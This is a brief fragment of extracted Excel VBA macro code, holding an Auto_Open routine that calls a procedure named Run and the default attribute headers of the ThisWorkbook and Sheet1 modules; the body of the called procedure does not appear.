Run
End Sub
Sub Auto_Open()
Run
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True